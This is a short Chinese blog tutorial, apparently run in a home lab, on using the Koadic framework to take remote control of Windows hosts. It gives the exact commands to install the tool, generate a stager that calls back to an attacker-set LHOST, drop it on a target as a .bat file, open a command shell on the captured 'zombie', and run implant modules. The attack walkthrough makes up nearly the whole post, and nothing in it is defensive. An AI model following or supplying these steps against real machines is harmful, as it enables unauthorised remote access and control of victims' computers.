• windows提权辅助工具koadic


    项目地址:https://github.com/zerosum0x0/koadic

    ┌─[root@sch01ar]─[/sch01ar]
    └──╼ #git clone https://github.com/zerosum0x0/koadic
    

     下载后打开并安装所需的包

    ┌─[root@sch01ar]─[/sch01ar/koadic]
    └──╼ #pip install -r requirements.txt
    

     安装完成后启动程序

    ┌─[root@sch01ar]─[/sch01ar/koadic]
    └──╼ #./koadic 
    

     

    输入use和空格然后连按两下Tab键查看模块

    stager开头的模块是用来反弹主机的,implant开头的模块是用来对反弹的主机进行操作

    选择stager/js/disk进行测试

    (koadic: sta/js/mshta)# use stager/js/disk
    

     

    查看配置信息

    (koadic: sta/js/disk)# info
    

     

    设置lhost

    (koadic: sta/js/disk)# set LHOST 192.168.220.132
    

     

    然后run

    (koadic: sta/js/disk)# run
    

     

    然后把[>]后的东西写到一个bat文件里,放到目标主机打开

    注:stager开头的模块都是一样的操作

    得到目标主机的反弹

    查看僵尸主机列表

    (koadic: sta/js/disk)# zombies
    

     

    注:此目标主机的ID为0

    执行cmd命令,0为主机的ID

    (koadic: sta/js/disk)# cmdshell 0
    
    [koadic: ZOMBIE 0 (192.168.220.129) - cmd.exe]> whoami
    

     

    该上implant模块了

    (koadic: sta/js/disk)# use implant/fun/voice
    

     

    这个MESSAGE随便你设置,然后run

    将会在目标主机朗读MESSAGE的内容

  • 相关阅读:
    Jboss未授权访问漏洞复现
    jboss反序列化漏洞复现(CVE-2017-7504)
    JBoss 5.x / 6.x反序列化漏洞(CVE-2017-12149)复现
    CVE-2019-5418复现
    CVE-2018-3760复现
    windows第三方提权——FileZilla提权
    msf学习
    脚本木马学习
    sql head注入
    sql 盲注理解
  • 原文地址:https://www.cnblogs.com/sch01ar/p/7857531.html
Copyright © 2020-2023  润新知